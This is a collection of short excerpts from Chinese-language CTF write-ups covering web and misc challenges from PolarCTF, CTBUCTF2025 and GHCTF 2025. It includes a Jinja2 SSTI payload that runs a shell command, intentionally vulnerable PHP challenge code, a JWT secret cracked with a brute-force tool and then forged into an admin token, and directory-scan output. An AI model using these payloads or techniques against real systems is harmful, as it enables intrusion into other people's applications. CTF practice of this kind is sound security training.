Don’t touch me考察点f12看源码
解题跟着源码里的路径访问
BlackMagic考察点trim函数
解题源码:
12345678910111213141516171819extract($_REQUEST);$strCharList = "\r\n\0\x0B ";$strFlag = "\r xxxxx...xxxxx \n";if(isset($strTmp)){ $strContent = trim($strFlag, $strCharList); if($strTmp == $strContent) { echo "flag{xxx...xxx}"; } else { echo "You're awesome, but not enough."; } }else { echo "I will ...
SSTI考察点python ssti
解题没有waf的ssti,用hackbar自带的payload即可
payload: {%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat /flag').read()}}{%endif%}{%endfor%}
flask_pin考察点flask_pin的生成
解题看报错有个?filename的接口可以读取文件内容,使用python脚本生成pin码
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import hashlibfrom itertools import chaindef mac(mac_ ...
网站被黑考察点php伪协议
解题请求头中找到hint,base32解密后是/n0_0ne_f1nd_m3/
访问后得到
123456789101112131415161718<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag|data|base|write|input/i",$file)){ echo "I am s ...
$$考察点将参数值作为变量名,php全局变量GLOBALS等
解题123456789101112131415161718<?php/*PolarD&N CTF*/highlight_file(__file__);error_reporting(0); include "flag.php";$a=$_GET['c'];if(isset($_GET['c'])){ if(preg_match('/flag|\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $a)){ die("oh on!!!");} else{ eval("var_dump($$a);");}& ...
jwt考察点jwt密钥爆破与生成
解题注册账号拿到jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QxMjMifQ.KBaDibvW3zIYwt-CYe0AKPbruXLW9VCHOHLx01PVaCk
123┌──(root㉿kali)-[~/c-jwt-cracker]└─# ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QxMjMifQ.KBaDibvW3zIYwt-CYe0AKPbruXLW9VCHOHLx01PVaCkSecret is "SYSA"
用工具爆破密钥
cyberchef生成admin的jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzUzNTkzMTcwfQ.r4xlmKEkSPc_m5aZI99Cmnt9hjosKVCyAwGwWQSKE88
登录后得到flag ...
php是世界上最好的语言考察点内置parse_str、extract函数,非法传参
解题123456789101112131415161718192021<?php//flag in $flaghighlight_file(__FILE__);include("flag.php");$c=$_POST['sys'];$key1 = 0;$key2 = 0;if(isset($_GET['flag1']) || isset($_GET['flag2']) || isset($_POST['flag1']) || isset($_POST['flag2'])) { die("nonononono");}@parse_str($_SERVER['QUERY_STRING']);extract($_POST);if($flag1 == '8gen1' && $flag2 ...
SWP考察点swp泄露+php正则回溯绕过
解题看题目可知是vim的缓冲区备份文件
用dirsearch扫描
1234567891011121314 _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12358Target: http://05003218-a7f1-4e4d-b88a-99a2bf9669c0.www.polarctf.com:8090/[22:17:16] Scanning:[22:17:17] 200 - 340B - /.index.php.swp[22:17:17] 200 - 44B - /index.php[22:17:46] 200 - 44B - /index.php/login/[22:17:57] 403 - 341B - /server-status[22:17:57] 403 - ...
MISC666和999的故事
将9替换成@得到一张二维码
扫描后得到flag
ctbuctf{The_Misc_Begins_Here_a00df5}
Do you know SSTV?听到这个声音就猜到是声音转图片,之前跟一个玩无线电的朋友玩过这个
不过手机上很容易受到杂音的干扰,看不请上面的字
电脑上用虚拟声卡播放看得很清楚
ctbuctf{N0thing_1s_impossible}
Ez_Base64
一把梭
ctbuctf{Base64_1s_Fun_7e6b89}
Zip_Master
AI梭
用bandizip打不开,但是用7zip可以打开
ctbuctf{Wooowoow_Yooua_Zip_Masteeeer!!!!!}
【签到】Welcome to CTBUCTF2025直接给的
ctbuctf{Welcome_to_CTBUCTF2025}
书读万遍其意自现
每次输入取一位secret,判断他加上key是否等于输入
ctbuctf{CAYLESsa ...
复现ez_readfile这题的exp执行时会吞字符,导致验证不通过,在这点卡了好久,结束时看WP出题人直接把check_vulnerable检查函数的failure换成pass跳过验证,而吞字符具体的原因他也不知道,好吧那就自己研究
12345678910<?php show_source(__FILE__); if (md5($_POST['a']) === md5($_POST['b'])) { if ($_POST['a'] != $_POST['b']) { if (is_string($_POST['a']) && is_string($_POST['b'])) { echo file_get_contents($_GET['file']); } } }?>
这 ...
GHCTF 2025 新生赛WP最酣畅淋漓的一集,学到了很多新知识
Webupload?SSTI!分析12345678910111213141516171819tmp_str = """<!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>查看文件内容</title> </head> <body> <h1>文件内容:{name}</h1> <!-- 显示文 ...
